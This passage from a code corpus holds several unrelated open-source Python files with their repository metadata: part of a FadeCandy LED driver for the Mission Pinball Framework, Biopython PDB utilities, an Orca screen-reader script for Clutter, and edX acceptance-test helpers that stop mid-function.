self.set_global_color_correction()
def set_linear_cutoff(self, linearcutoff):
"""Sets the of the linear cutoff of the FadeCandy.
From the FadeCandy documentation:
By default, brightness curves are entirely nonlinear. By setting
`linearcutoff` to a nonzero value, though, a linear area may be
defined at the bottom of the brightness curve.
The linear section, near zero, avoids creating very low output
values that will cause distracting flicker when dithered. This isn't
a problem when the LEDs are viewed indirectly such that the flicker
is below the threshold of perception, but in cases where the flicker
            is a problem this linear section can eliminate it entirely at the
cost of some dynamic range. To enable the linear section, set
`linearcutoff` to some nonzero value. A good starting point is
            1/256.0, corresponding to the lowest 8-bit PWM level.
Args:
linearcutoff: Float of the new linear cutoff. Default is 0.0.
"""
self.linear_cutoff = float(linearcutoff)
self.set_global_color_correction()
def enable_interpolation(self):
"""Enables the FadeCandy's keyframe interpolation.
From the FadeCandy documentation:
By default, Fadecandy interprets each frame it receives as a
keyframe. In-between these keyframes, Fadecandy will generate smooth
intermediate frames using linear interpolation. The interpolation
duration is determined by the elapsed time between when the final
packet of one frame is received and when the final packet of the
next frame is received.
This scheme works well when frames are arriving at a nearly constant
rate. If frames suddenly arrive slower than they had been arriving,
interpolation will proceed faster than it optimally should, and one
keyframe will hold steady until the next keyframe arrives. If frames
suddenly arrive faster than they had been arriving, Fadecandy will
need to jump ahead in order to avoid falling behind.
When enabled, MPF will send an update to the FadeCandy on every machine
tick (regardless of whether there are updates for the LEDs) in order to
maintain a consistent update rate.
Note that this setting is written to the FadeCandy's firmware. It will
persist until it's changed. It is enabled by default.
"""
self.keyframe_interpolation = True
self.write_firmware_options()
self.update_every_tick = True
def disable_interpolation(self):
"""Disables the FadeCandy's keyframe interpolation.
See the documentation for the ``enable_interpolation()`` method for a
description of how this works.
Note that this setting is written to the FadeCandy's firmware. It will
persist until it's changed. It is enabled by default.
"""
self.keyframe_interpolation = False
self.write_firmware_options()
self.update_every_tick = False
def enable_dithering(self):
"""Enables the FadeCandy's smooth dithering of color values.
Note that this setting is written to the FadeCandy's firmware. It will
persist until it's changed. It is enabled by default.
From the FadeCandy documentation:
Fadecandy internally represents colors with 16 bits of precision per
channel, or 48 bits per pixel. Why 48-bit color? In combination with
our dithering algorithm, this gives a lot more color resolution.
It's especially helpful near the low end of the brightness range,
where stair-stepping and color popping artifacts can be most
apparent.
"""
self.dithering = True
self.write_firmware_options()
def disable_dithering(self):
"""Disables the FadeCandy's smooth dithering of color values.
Note that this setting is written to the FadeCandy's firmware. It will
persist until it's changed. It is enabled by default.
"""
self.dithering = False
self.write_firmware_options()
def set_global_color_correction(self):
"""Writes the current global color correction settings (gamma, white
point, linear slope, and linear cutoff) to the FadeCandy server.
"""
msg = json.dumps({
'gamma': self.gamma,
'whitepoint': self.whitepoint,
'linearSlope': self.linear_slope,
'linearCutoff': self.linear_cutoff
})
self.send(struct.pack(
"!BBHHH", 0x00, 0xFF, len(msg) + 4, 0x0001, 0x0001) + msg)
def write_firmware_options(self):
"""Writes the current firmware settings (keyframe interpolation and
dithering) to the FadeCandy hardware.
"""
config_byte = 0x00
if not self.dithering:
config_byte |= 0x01
if not self.keyframe_interpolation:
config_byte |= 0x02
# manual LED control
# config_byte = config_byte | 0x04
# turn LED on
# config_byte = config_byte | 0x08
self.send(struct.pack(
"!BBHHHB", 0x00, 0xFF, 0x0005, 0x0001, 0x0002, config_byte))
# The MIT License (MIT)
# Copyright (c) 2013-2015 Brian Madden and Gabe Knuth
# Permission is hereby granted, free of charge, to any person obtaining a copy
# of this software and associated documentation files (the "Software"), to deal
# in the Software without restriction, including without limitation the rights
# to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
# copies of the Software, and to permit persons to whom the Software is
# furnished to do so, subject to the following conditions:
# The above copyright notice and this permission notice shall be included in
# all copies or substantial portions of the Software.
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN
# THE SOFTWARE.
|
spierepf/mpf
|
mpf/platform/fadecandy.py
|
Python
|
mit
| 10,453
|
[
"Brian"
] |
ffdf1b0f560d3a62cd38227129ed396752d0cbc00422a17f9e24e5fd1ef187bf
|
import Bio.PDB
DIRTY_ATOMS = {'1H', '2H', '3H', 'OXT'}
BACKBONE_NAMES = {'N', 'CA', 'C', 'O', 'H', 'HA'}
def get_pdb_residue_count(pdb):
"""Returns the residue count of a Bio.PDB.Structure.Structure."""
return sum([len(c.child_list) for c in pdb.child_list[0].child_list])
def get_chain_residue_count(struct, chain_id):
"""Returns the residue count of a Bio.PDB.Structure.Structure."""
return len(get_chain(struct, chain_id).child_list)
def copy_residues(pdb, chain_ids=None):
return [r.copy() for r in get_residues(pdb, chain_ids)]
def get_residues(pdb, chain_ids=None):
"""Returns returns residues copied from a PDB.
Args:
- pdb - Bio.PDB.Structure.Structure.
- chain_ids - strip residues from these specific chain_ids only.
Returns:
- residues - a list of Bio.PDB.Residue.Residue.
"""
residues = []
for model in pdb:
for chain in model:
            if chain_ids is None or chain.id in chain_ids:
residues.extend(chain.child_list)
return residues
def get_chain(struct, chain_id='A'):
"""Returns a specific chain from a Bio.PDB.Structure.Structure."""
return struct.child_list[0].child_dict[chain_id]
def get_chains(struct):
"""Returns all chains of a Bio.PDB.Structure.Structure."""
return struct.child_list[0].child_list
def read_pdb(
read_path,
pdb_name=None
):
"""Reads a PDB file and returns a BioPython structure.
Args:
- read_path - PDB string file path to read from.
- pdb_name - a string to set as the name of the Bio.PDB.Structure.Structure.
Returns:
- structure - Bio.PDB.Structure.Structure.
"""
    if pdb_name is None:
pdb_name = read_path.split('/')[-1].replace('.', '_')
parser = Bio.PDB.PDBParser(PERMISSIVE=False)
structure = parser.get_structure(pdb_name, read_path)
return structure
def save_cif(**kwargs):
"""Saves a Bio.PDB.Structure.Structure as a CIF file. Does not automatically
append .cif extension.
Args:
- struct - Bio.PDB.Structure.Structure to be saved.
- path - CIF string file path.
"""
struct = kwargs.pop('struct')
path = kwargs.pop('path')
with open(path, 'w') as file:
io = Bio.PDB.mmcifio.MMCIFIO()
io.set_structure(struct)
io.save(file)
# Temporary fix for CIF files not getting parsed properly by Rosetta: add
# a dummy section at the end. ("Note that the final table in the cif file
# may not be recognized - adding a dummy entry (like `_citation.title
# ""`) to the end of the file may help.")
        file.write('_citation.title "Elfin"')
def save_pdb(**kwargs):
"""Saves a Bio.PDB.Structure.Structure as a PDB file.
Args:
- struct - Bio.PDB.Structure.Structure to be saved.
    - path - string file path.
"""
struct = kwargs.pop('struct')
path = kwargs.pop('path')
io = Bio.PDB.PDBIO()
io.set_structure(struct)
io.save(path)
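# Example usage (a minimal sketch; '1abc.pdb' is a hypothetical input file):
#   struct = read_pdb('1abc.pdb')
#   print(get_pdb_residue_count(struct))
#   save_cif(struct=struct, path='1abc.cif')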
def main():
"""main"""
raise RuntimeError('This module should not be executed as a script')
if __name__ == '__main__':
main()
|
joy13975/elfin
|
elfinpy/pdb_utilities.py
|
Python
|
mit
| 3,134
|
[
"Biopython"
] |
51fa680441e304b5e12aff2445a2e84320888fa4c5f4f3735560183c4159a78b
|
# Orca
#
# Copyright (C) 2010-2013 Igalia, S.L.
#
# Author: Alejandro Pinheiro Iglesias <apinheiro@igalia.com>
# Author: Joanmarie Diggs <jdiggs@igalia.com>
#
# This library is free software; you can redistribute it and/or
# modify it under the terms of the GNU Lesser General Public
# License as published by the Free Software Foundation; either
# version 2.1 of the License, or (at your option) any later version.
#
# This library is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
# Lesser General Public License for more details.
#
# You should have received a copy of the GNU Lesser General Public
# License along with this library; if not, write to the
# Free Software Foundation, Inc., Franklin Street, Fifth Floor,
# Boston MA 02110-1301 USA.
__id__ = "$Id$"
__version__ = "$Revision$"
__date__ = "$Date$"
__copyright__ = "Copyright (c) 2010-2013 Igalia, S.L."
__license__ = "LGPL"
from gi.repository import Gdk
import orca.scripts.default as default
import orca.debug as debug
from .script_utilities import Utilities
# Non-printable unicode categories. Full table:
# http://www.fileformat.info/info/unicode/category/index.htm
non_printable_set = ('Cc', 'Cf', 'Cn', 'Co', 'Cs')
def _unicharIsPrint(unichar):
""" Checks if the unichar is printable
Equivalent to g_unichar_isprint
Arguments:
- unichar: unichar to check if it is printable
"""
    try:
        import unicodedata
        category = unicodedata.category(unichar)
        result = category not in non_printable_set
    except TypeError:
        # An exception here normally means we received a multi-character
        # string (e.g. 'Control_L') instead of a single unicode character
        result = False
return result
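# Example (a sketch): _unicharIsPrint('a') is True (category 'Ll'), while
# _unicharIsPrint('\x00') is False (category 'Cc'), and a multi-character key
# name such as 'Control_L' also yields False via the TypeError branch.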
def _computeIsText(string):
"""Decides if the string representation of a keyboard event is
text or not
Based on the at-spi equivalent code.
Arguments:
- string: a string representation of a keyboardEvent.
"""
    is_text = False
    if string:
        is_text = _unicharIsPrint(string)
return is_text
class Script(default.Script):
def __init__(self, app):
default.Script.__init__(self, app)
def getUtilities(self):
return Utilities(self)
def checkKeyboardEventData(self, keyboardEvent):
"""Processes the given keyboard event.
Here is used to:
* Fill event_string using the key.id
* Set the is_text properly
Arguments:
- keyboardEvent: an instance of input_event.KeyboardEvent
"""
# On the AtkKeyEventStruct documentation you can find this
# description:
# guint keyval;
# A guint representing a keysym value corresponding to those
# used by GDK
#
        # There is no Clutter way to get a gdk-like keyval name.
        # Anyway, cally will fill event_string with the final
        # representation of a text char.
        #
        # In the same way, Clutter provides the keyval without the
        # modifiers, while GDK includes them. We will try to apply them,
        # at least to compute keyval_name
#
# More information:
# http://library.gnome.org/devel/atk/stable/AtkUtil.html
# http://bugzilla.o-hand.com/show_bug.cgi?id=2072
# apply the modifiers to keyboardEvent.id
#
keyval = keyboardEvent.id
try:
keymap = Gdk.Keymap.get_default()
if keymap:
success, entries = keymap.get_entries_for_keyval(keyval)
group = entries[0].group
modifiers = Gdk.ModifierType(keyboardEvent.modifiers)
                success, keyval, egroup, level, consumed = \
                    keymap.translate_keyboard_state(keyboardEvent.hw_code,
                                                    modifiers,
                                                    group)
        except Exception:
debug.println(debug.LEVEL_FINE,
"Could not compute keyval with modifiers")
string = "prev keyval=%d" % keyboardEvent.id
string = string + " post keyval=%d" % keyval
debug.println(debug.LEVEL_FINE, string)
keyboardEvent.id = keyval
        # If cally doesn't provide an event_string we compute it using
        # Gdk. keyval_name will probably be computed again later, but to
        # keep the code simple, and not start adding guess-code here, we
        # maintain it this way
        #
        if keyboardEvent.event_string == "":
            debug.println(debug.LEVEL_FINE, "Computing event_string")
try:
keyboardEvent.event_string = Gdk.keyval_name(keyboardEvent.id)
            except Exception:
debug.println(debug.LEVEL_FINE,
"Could not obtain keyval_name for id: %d" \
% keyboardEvent.id)
# at-spi uses event_string to compute is_text, so if it is
# NULL we should compute again with the proper
# event_string
#
keyboardEvent.is_text = _computeIsText(keyboardEvent.event_string)
return default.Script.checkKeyboardEventData(self, keyboardEvent)
|
ruibarreira/linuxtrail
|
usr/lib/python3/dist-packages/orca/scripts/toolkits/clutter/script.py
|
Python
|
gpl-3.0
| 5,376
|
[
"ORCA"
] |
eb8c5b99ce38f50494887d7e83aff70540aceb448fb580afdb6f466c385fdf37
|
"""
Test helper functions and base classes.
"""
import functools
import inspect
import json
import operator
import os
import pprint
import unittest
import urlparse
from contextlib import contextmanager
from datetime import datetime
from unittest import TestCase
import requests
from bok_choy.javascript import js_defined
from bok_choy.page_object import XSS_INJECTION
from bok_choy.promise import EmptyPromise, Promise
from bok_choy.web_app_test import WebAppTest
from opaque_keys.edx.locator import CourseLocator
from path import Path as path
from pymongo import ASCENDING, MongoClient
from selenium.common.exceptions import StaleElementReferenceException
from selenium.webdriver.common.desired_capabilities import DesiredCapabilities
from selenium.webdriver.common.keys import Keys
from selenium.webdriver.support import expected_conditions as EC
from selenium.webdriver.support.select import Select
from selenium.webdriver.support.ui import WebDriverWait
from capa.tests.response_xml_factory import MultipleChoiceResponseXMLFactory
from common.test.acceptance.fixtures.course import XBlockFixtureDesc
from common.test.acceptance.pages.common import BASE_URL
from common.test.acceptance.pages.common.auto_auth import AutoAuthPage
from openedx.core.lib.tests.assertions.events import EventMatchTolerates, assert_event_matches, is_matching_event
from openedx.core.release import RELEASE_LINE, doc_version
from xmodule.partitions.partitions import UserPartition
MAX_EVENTS_IN_FAILURE_OUTPUT = 20
def skip_if_browser(browser):
"""
Method decorator that skips a test if browser is `browser`
Args:
browser (str): name of internet browser
Returns:
Decorated function
"""
def decorator(test_function):
@functools.wraps(test_function)
def wrapper(self, *args, **kwargs):
if self.browser.name == browser:
raise unittest.SkipTest('Skipping as this test will not work with {}'.format(browser))
test_function(self, *args, **kwargs)
return wrapper
return decorator
def is_youtube_available():
"""
Check if the required youtube urls are available.
If a URL in `youtube_api_urls` is not reachable then subsequent URLs will not be checked.
Returns:
bool:
"""
# TODO: Design and implement a better solution that is reliable and repeatable,
# reflects how the application works in production, and limits the third-party
# network traffic (e.g. repeatedly retrieving the js from youtube from the browser).
youtube_api_urls = {
'main': 'https://www.youtube.com/',
'player': 'https://www.youtube.com/iframe_api',
# For transcripts, you need to check an actual video, so we will
# just specify our default video and see if that one is available.
'transcript': 'http://video.google.com/timedtext?lang=en&v=3_yD_cEKoCk',
}
for url in youtube_api_urls.itervalues():
try:
response = requests.get(url, allow_redirects=False)
except requests.exceptions.ConnectionError:
return False
if response.status_code >= 300:
return False
return True
def is_focused_on_element(browser, selector):
"""
Check if the focus is on the element that matches the selector.
"""
return browser.execute_script("return $('{}').is(':focus')".format(selector))
def load_data_str(rel_path):
"""
Load a file from the "data" directory as a string.
`rel_path` is the path relative to the data directory.
"""
full_path = path(__file__).abspath().dirname() / "data" / rel_path
with open(full_path) as data_file:
return data_file.read()
def remove_file(filename):
"""
Remove a file if it exists
"""
if os.path.exists(filename):
os.remove(filename)
def disable_animations(page):
"""
Disable jQuery and CSS3 animations.
"""
disable_jquery_animations(page)
disable_css_animations(page)
def enable_animations(page):
"""
Enable jQuery and CSS3 animations.
"""
enable_jquery_animations(page)
enable_css_animations(page)
@js_defined('window.jQuery')
def disable_jquery_animations(page):
"""
Disable jQuery animations.
"""
page.browser.execute_script("jQuery.fx.off = true;")
@js_defined('window.jQuery')
def enable_jquery_animations(page):
"""
Enable jQuery animations.
"""
page.browser.execute_script("jQuery.fx.off = false;")
def disable_css_animations(page):
"""
Disable CSS3 animations, transitions, transforms.
"""
page.browser.execute_script("""
var id = 'no-transitions';
// if styles were already added, just do nothing.
if (document.getElementById(id)) {
return;
}
var css = [
'* {',
'-webkit-transition: none !important;',
'-moz-transition: none !important;',
'-o-transition: none !important;',
'-ms-transition: none !important;',
'transition: none !important;',
'-webkit-transition-property: none !important;',
'-moz-transition-property: none !important;',
'-o-transition-property: none !important;',
'-ms-transition-property: none !important;',
'transition-property: none !important;',
'-webkit-transform: none !important;',
'-moz-transform: none !important;',
'-o-transform: none !important;',
'-ms-transform: none !important;',
'transform: none !important;',
'-webkit-animation: none !important;',
'-moz-animation: none !important;',
'-o-animation: none !important;',
'-ms-animation: none !important;',
'animation: none !important;',
'}'
].join(''),
head = document.head || document.getElementsByTagName('head')[0],
styles = document.createElement('style');
styles.id = id;
styles.type = 'text/css';
if (styles.styleSheet){
styles.styleSheet.cssText = css;
} else {
styles.appendChild(document.createTextNode(css));
}
head.appendChild(styles);
""")
def enable_css_animations(page):
"""
Enable CSS3 animations, transitions, transforms.
"""
page.browser.execute_script("""
var styles = document.getElementById('no-transitions'),
head = document.head || document.getElementsByTagName('head')[0];
head.removeChild(styles)
""")
def select_option_by_text(select_browser_query, option_text, focus_out=False):
"""
Chooses an option within a select by text (helper method for Select's select_by_visible_text method).
Wrap this in a Promise to prevent a StaleElementReferenceException
from being raised while the DOM is still being rewritten
"""
def select_option(query, value):
""" Get the first select element that matches the query and select the desired value. """
try:
select = Select(query.first.results[0])
select.select_by_visible_text(value)
if focus_out:
query.first.results[0].send_keys(Keys.TAB)
return True
except StaleElementReferenceException:
return False
msg = 'Selected option {}'.format(option_text)
EmptyPromise(lambda: select_option(select_browser_query, option_text), msg).fulfill()
def get_selected_option_text(select_browser_query):
"""
Returns the text value for the first selected option within a select.
Wrap this in a Promise to prevent a StaleElementReferenceException
from being raised while the DOM is still being rewritten
"""
def get_option(query):
""" Get the first select element that matches the query and return its value. """
try:
select = Select(query.first.results[0])
return (True, select.first_selected_option.text)
except StaleElementReferenceException:
return (False, None)
text = Promise(lambda: get_option(select_browser_query), 'Retrieved selected option text').fulfill()
return text
def get_options(select_browser_query):
"""
Returns all the options for the given select.
"""
return Select(select_browser_query.first.results[0]).options
def generate_course_key(org, number, run):
"""
Makes a CourseLocator from org, number and run
"""
default_store = os.environ.get('DEFAULT_STORE', 'draft')
return CourseLocator(org, number, run, deprecated=(default_store == 'draft'))
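# Example (a sketch): generate_course_key('edX', 'DemoX', 'T1') returns a
# CourseLocator that serializes as 'edX/DemoX/T1' when DEFAULT_STORE is
# 'draft' (deprecated keys) and as 'course-v1:edX+DemoX+T1' otherwise.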
def select_option_by_value(browser_query, value, focus_out=False):
"""
Selects a html select element by matching value attribute
"""
select = Select(browser_query.first.results[0])
select.select_by_value(value)
    def options_selected():
        """
        Returns True if every option in the select element whose value
        attribute matches `value` is selected. If any such option is not
        selected, selects it and returns False. If `value` is not among
        the option choices, returns False.
        """
all_options_selected = True
has_option = False
for opt in select.options:
if opt.get_attribute('value') == value:
has_option = True
if not opt.is_selected():
all_options_selected = False
opt.click()
if all_options_selected and not has_option:
all_options_selected = False
if focus_out:
browser_query.first.results[0].send_keys(Keys.TAB)
return all_options_selected
# Make sure specified option is actually selected
EmptyPromise(options_selected, "Option is selected").fulfill()
def is_option_value_selected(browser_query, value):
"""
return true if given value is selected in html select element, else return false.
"""
select = Select(browser_query.first.results[0])
ddl_selected_value = select.first_selected_option.get_attribute('value')
return ddl_selected_value == value
def element_has_text(page, css_selector, text):
"""
    Return True if the given text is present in one of the elements matched by the CSS selector.
"""
text_present = False
text_list = page.q(css=css_selector).text
if len(text_list) > 0 and (text in text_list):
text_present = True
return text_present
def get_modal_alert(browser):
"""
Returns instance of modal alert box shown in browser after waiting
for 6 seconds
"""
WebDriverWait(browser, 6).until(EC.alert_is_present())
return browser.switch_to.alert
def get_element_padding(page, selector):
"""
Get Padding of the element with given selector,
:returns a dict object with the following keys.
1 - padding-top
2 - padding-right
3 - padding-bottom
4 - padding-left
Example Use:
progress_page.get_element_padding('.wrapper-msg.wrapper-auto-cert')
"""
js_script = """
var $element = $('%(selector)s');
element_padding = {
'padding-top': $element.css('padding-top').replace("px", ""),
'padding-right': $element.css('padding-right').replace("px", ""),
'padding-bottom': $element.css('padding-bottom').replace("px", ""),
'padding-left': $element.css('padding-left').replace("px", "")
};
return element_padding;
""" % {'selector': selector}
return page.browser.execute_script(js_script)
def is_404_page(browser):
""" Check if page is 404 """
return 'Page not found (404)' in browser.find_element_by_tag_name('h1').text
def create_multiple_choice_xml(correct_choice=2, num_choices=4):
"""
Return the Multiple Choice Problem XML, given the name of the problem.
"""
# all choices are incorrect except for correct_choice
choices = [False for _ in range(num_choices)]
choices[correct_choice] = True
choice_names = ['choice_{}'.format(index) for index in range(num_choices)]
question_text = 'The correct answer is Choice {}'.format(correct_choice)
return MultipleChoiceResponseXMLFactory().build_xml(
question_text=question_text,
choices=choices,
choice_names=choice_names,
)
def create_multiple_choice_problem(problem_name):
"""
Return the Multiple Choice Problem Descriptor, given the name of the problem.
"""
xml_data = create_multiple_choice_xml()
return XBlockFixtureDesc(
'problem',
problem_name,
data=xml_data,
metadata={'rerandomize': 'always'}
)
def auto_auth(browser, username, email, staff, course_id):
"""
Logout and login with given credentials.
"""
AutoAuthPage(browser, username=username, email=email, course_id=course_id, staff=staff).visit()
def assert_link(test, expected_link, actual_link):
"""
Assert that 'href' and text inside help DOM element are correct.
Arguments:
test: Test on which links are being tested.
expected_link (dict): The expected link attributes.
actual_link (dict): The actual link attribute on page.
"""
test.assertEqual(expected_link['href'], actual_link.get_attribute('href'))
test.assertEqual(expected_link['text'], actual_link.text)
def assert_opened_help_link_is_correct(test, url):
"""
Asserts that url of browser when help link is clicked is correct.
Arguments:
test (AcceptanceTest): test calling this method.
url (str): url to verify.
"""
test.browser.switch_to_window(test.browser.window_handles[-1])
WebDriverWait(test.browser, 10).until(lambda driver: driver.current_url == url)
# Check that the URL loads. Can't do this in the browser because it might
# be loading a "Maze Found" missing content page.
response = requests.get(url)
test.assertEqual(response.status_code, 200, "URL {!r} returned {}".format(url, response.status_code))
EDX_BOOKS = {
'course_author': 'edx-partner-course-staff',
'learner': 'edx-guide-for-students',
}
OPEN_BOOKS = {
'course_author': 'open-edx-building-and-running-a-course',
'learner': 'open-edx-learner-guide',
}
def url_for_help(book_slug, path):
"""
Create a full help URL given a book slug and a path component.
"""
# Emulate the switch between books that happens in envs/bokchoy.py
books = EDX_BOOKS if RELEASE_LINE == "master" else OPEN_BOOKS
url = 'http://edx.readthedocs.io/projects/{}/en/{}{}'.format(books[book_slug], doc_version(), path)
return url
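# Example (a sketch): on the "master" release line,
# url_for_help('learner', '/index.html') yields
# 'http://edx.readthedocs.io/projects/edx-guide-for-students/en/<doc_version()>/index.html'.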
class EventsTestMixin(TestCase):
"""
Helpers and setup for running tests that evaluate events emitted
"""
def setUp(self):
super(EventsTestMixin, self).setUp()
mongo_host = 'edx.devstack.mongo' if 'BOK_CHOY_HOSTNAME' in os.environ else 'localhost'
self.event_collection = MongoClient(mongo_host)["test"]["events"]
self.start_time = datetime.now()
def reset_event_tracking(self):
"""Drop any events that have been collected thus far and start collecting again from scratch."""
self.event_collection.drop()
self.start_time = datetime.now()
@contextmanager
def capture_events(self, event_filter=None, number_of_matches=1, captured_events=None):
"""
Context manager that captures all events emitted while executing a particular block.
All captured events are stored in the list referenced by `captured_events`. Note that this list is appended to
*in place*. The events will be appended to the list in the order they are emitted.
The `event_filter` is expected to be a callable that allows you to filter the event stream and select particular
events of interest. A dictionary `event_filter` is also supported, which simply indicates that the event should
match that provided expectation.
`number_of_matches` tells this context manager when enough events have been found and it can move on. The
context manager will not exit until this many events have passed the filter. If not enough events are found
before a timeout expires, then this will raise a `BrokenPromise` error. Note that this simply states that
*at least* this many events have been emitted, so `number_of_matches` is simply a lower bound for the size of
`captured_events`.
"""
start_time = datetime.utcnow()
yield
events = self.wait_for_events(
start_time=start_time, event_filter=event_filter, number_of_matches=number_of_matches)
if captured_events is not None and hasattr(captured_events, 'append') and callable(captured_events.append):
for event in events:
captured_events.append(event)
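    # Example usage (a sketch; the event type and trigger are hypothetical):
    #   captured = []
    #   with self.capture_events({'event_type': 'problem_check'}, 1, captured):
    #       trigger_the_event_under_test()
    #   # `captured` now holds at least one matching event dict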
@contextmanager
def assert_events_match_during(self, event_filter=None, expected_events=None, in_order=True):
"""
Context manager that ensures that events matching the `event_filter` and `expected_events` are emitted.
This context manager will filter out the event stream using the `event_filter` and wait for
`len(expected_events)` to match the filter.
It will then compare the events in order with their counterpart in `expected_events` to ensure they match the
more detailed assertion.
Typically `event_filter` will be an `event_type` filter and the `expected_events` list will contain more
detailed assertions.
"""
captured_events = []
with self.capture_events(event_filter, len(expected_events), captured_events):
yield
self.assert_events_match(expected_events, captured_events, in_order=in_order)
def wait_for_events(self, start_time=None, event_filter=None, number_of_matches=1, timeout=None):
"""
Wait for `number_of_matches` events to pass the `event_filter`.
By default, this will look at all events that have been emitted since the beginning of the setup of this mixin.
A custom `start_time` can be specified which will limit the events searched to only those emitted after that
time.
The `event_filter` is expected to be a callable that allows you to filter the event stream and select particular
events of interest. A dictionary `event_filter` is also supported, which simply indicates that the event should
match that provided expectation.
`number_of_matches` lets us know when enough events have been found and it can move on. The function will not
return until this many events have passed the filter. If not enough events are found before a timeout expires,
then this will raise a `BrokenPromise` error. Note that this simply states that *at least* this many events have
been emitted, so `number_of_matches` is simply a lower bound for the size of `captured_events`.
Specifying a custom `timeout` can allow you to extend the default 30 second timeout if necessary.
"""
if start_time is None:
start_time = self.start_time
if timeout is None:
timeout = 30
def check_for_matching_events():
"""Gather any events that have been emitted since `start_time`"""
return self.matching_events_were_emitted(
start_time=start_time,
event_filter=event_filter,
number_of_matches=number_of_matches
)
return Promise(
check_for_matching_events,
# This is a bit of a hack, Promise calls str(description), so I set the description to an object with a
# custom __str__ and have it do some intelligent stuff to generate a helpful error message.
CollectedEventsDescription(
'Waiting for {number_of_matches} events to match the filter:\n{event_filter}'.format(
number_of_matches=number_of_matches,
event_filter=self.event_filter_to_descriptive_string(event_filter),
),
functools.partial(self.get_matching_events_from_time, start_time=start_time, event_filter={})
),
timeout=timeout
).fulfill()
def matching_events_were_emitted(self, start_time=None, event_filter=None, number_of_matches=1):
"""Return True if enough events have been emitted that pass the `event_filter` since `start_time`."""
matching_events = self.get_matching_events_from_time(start_time=start_time, event_filter=event_filter)
return len(matching_events) >= number_of_matches, matching_events
def get_matching_events_from_time(self, start_time=None, event_filter=None):
"""
Return a list of events that pass the `event_filter` and were emitted after `start_time`.
This function is used internally by most of the other assertions and convenience methods in this class.
The `event_filter` is expected to be a callable that allows you to filter the event stream and select particular
events of interest. A dictionary `event_filter` is also supported, which simply indicates that the event should
match that provided expectation.
"""
if start_time is None:
start_time = self.start_time
if isinstance(event_filter, dict):
event_filter = functools.partial(is_matching_event, event_filter)
elif not callable(event_filter):
raise ValueError(
                'event_filter must either be a dict or a callable function with a single "event" parameter that '
'returns a boolean value.'
)
matching_events = []
cursor = self.event_collection.find(
{
"time": {
"$gte": start_time
}
}
).sort("time", ASCENDING)
for event in cursor:
matches = False
try:
# Mongo automatically assigns an _id to all events inserted into it. We strip it out here, since
# we don't care about it.
del event['_id']
if event_filter is not None:
# Typically we will be grabbing all events of a particular type, however, you can use arbitrary
# logic to identify the events that are of interest.
matches = event_filter(event)
except AssertionError:
# allow the filters to use "assert" to filter out events
continue
else:
if matches is None or matches:
matching_events.append(event)
return matching_events
def assert_matching_events_were_emitted(self, start_time=None, event_filter=None, number_of_matches=1):
"""Assert that at least `number_of_matches` events have passed the filter since `start_time`."""
description = CollectedEventsDescription(
'Not enough events match the filter:\n' + self.event_filter_to_descriptive_string(event_filter),
functools.partial(self.get_matching_events_from_time, start_time=start_time, event_filter={})
)
self.assertTrue(
self.matching_events_were_emitted(
start_time=start_time, event_filter=event_filter, number_of_matches=number_of_matches
),
description
)
def assert_no_matching_events_were_emitted(self, event_filter, start_time=None):
"""Assert that no events have passed the filter since `start_time`."""
matching_events = self.get_matching_events_from_time(start_time=start_time, event_filter=event_filter)
description = CollectedEventsDescription(
            'Events unexpectedly matched the filter:\n' + self.event_filter_to_descriptive_string(event_filter),
lambda: matching_events
)
        self.assertEqual(len(matching_events), 0, description)
def assert_events_match(self, expected_events, actual_events, in_order=True):
"""Assert that each actual event matches one of the expected events.
Args:
expected_events (List): a list of dicts representing the expected events.
actual_events (List): a list of dicts that were actually recorded.
in_order (bool): if True then the events must be in the same order (defaults to True).
"""
if in_order:
for expected_event, actual_event in zip(expected_events, actual_events):
assert_event_matches(
expected_event,
actual_event,
tolerate=EventMatchTolerates.lenient()
)
else:
for expected_event in expected_events:
                actual_event = next(
                    (event for event in actual_events if is_matching_event(expected_event, event)),
                    None)
assert_event_matches(
expected_event,
actual_event or {},
tolerate=EventMatchTolerates.lenient()
)
def relative_path_to_absolute_uri(self, relative_path):
"""Return an aboslute URI given a relative path taking into account the test context."""
return urlparse.urljoin(BASE_URL, relative_path)
def event_filter_to_descriptive_string(self, event_filter):
"""Find the source code of the callable or pretty-print the dictionary"""
message = ''
if callable(event_filter):
file_name = '(unknown)'
try:
file_name = inspect.getsourcefile(event_filter)
except TypeError:
pass
try:
list_of_source_lines, line_no = inspect.getsourcelines(event_filter)
except IOError:
pass
else:
message = '{file_name}:{line_no}\n{hr}\n{event_filter}\n{hr}'.format(
event_filter=''.join(list_of_source_lines).rstrip(),
file_name=file_name,
line_no=line_no,
hr='-' * 20,
)
if not message:
message = '{hr}\n{event_filter}\n{hr}'.format(
event_filter=pprint.pformat(event_filter),
hr='-' * 20,
)
return message
class CollectedEventsDescription(object):
"""
Produce a clear error message when tests fail.
This class calls the provided `get_events_func` when converted to a string, and pretty prints the returned events.
"""
def __init__(self, description, get_events_func):
self.description = description
self.get_events_func = get_events_func
def __str__(self):
message_lines = [
self.description,
'Events:'
]
events = self.get_events_func()
events.sort(key=operator.itemgetter('time'), reverse=True)
for event in events[:MAX_EVENTS_IN_FAILURE_OUTPUT]:
message_lines.append(pprint.pformat(event))
if len(events) > MAX_EVENTS_IN_FAILURE_OUTPUT:
message_lines.append(
'Too many events to display, the remaining events were omitted. Run locally to diagnose.')
return '\n\n'.join(message_lines)
class AcceptanceTest(WebAppTest):
"""
The base class of all acceptance tests.
"""
def __init__(self, *args, **kwargs):
super(AcceptanceTest, self).__init__(*args, **kwargs)
# Use long messages so that failures show actual and expected values
self.longMessage = True # pylint: disable=invalid-name
def tearDown(self):
try:
self.browser.get('http://{}:{}'.format(
os.environ.get('BOK_CHOY_HOSTNAME', '127.0.0.1'),
os.environ.get('BOK_CHOY_LMS_PORT', 8003),
))
except: # pylint: disable=bare-except
self.browser.get('http://{}:{}'.format(
